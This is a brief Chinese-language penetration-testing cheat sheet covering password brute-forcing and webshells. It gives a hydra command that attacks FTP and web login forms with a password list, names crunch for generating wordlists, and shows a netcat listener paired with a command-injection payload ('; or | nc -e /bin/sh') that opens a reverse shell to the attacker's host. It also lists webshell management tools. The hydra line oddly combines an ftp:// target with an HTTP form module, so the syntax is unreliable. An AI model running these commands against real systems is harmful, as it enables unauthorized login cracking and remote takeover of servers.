8.暴力破解
密码生成工具:kali中的crunch
暴力破解工具:hydra
hydra -l user -P passlist.txt ftp://192.168.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:incorrect"
注意:大写参数表示使用字典,小写使用是特定字符(-l user--用户名是user;-L passlist.txt)
9.webshell
文件上传,文件包含,代码执行
代码执行:
kali中监听:nc -vv -l -p 8080
客户端:;或者 | nc -e /bin/sh "url" "port"
主要使用工具:冰蝎、菜刀、哥斯拉、蚁剑等。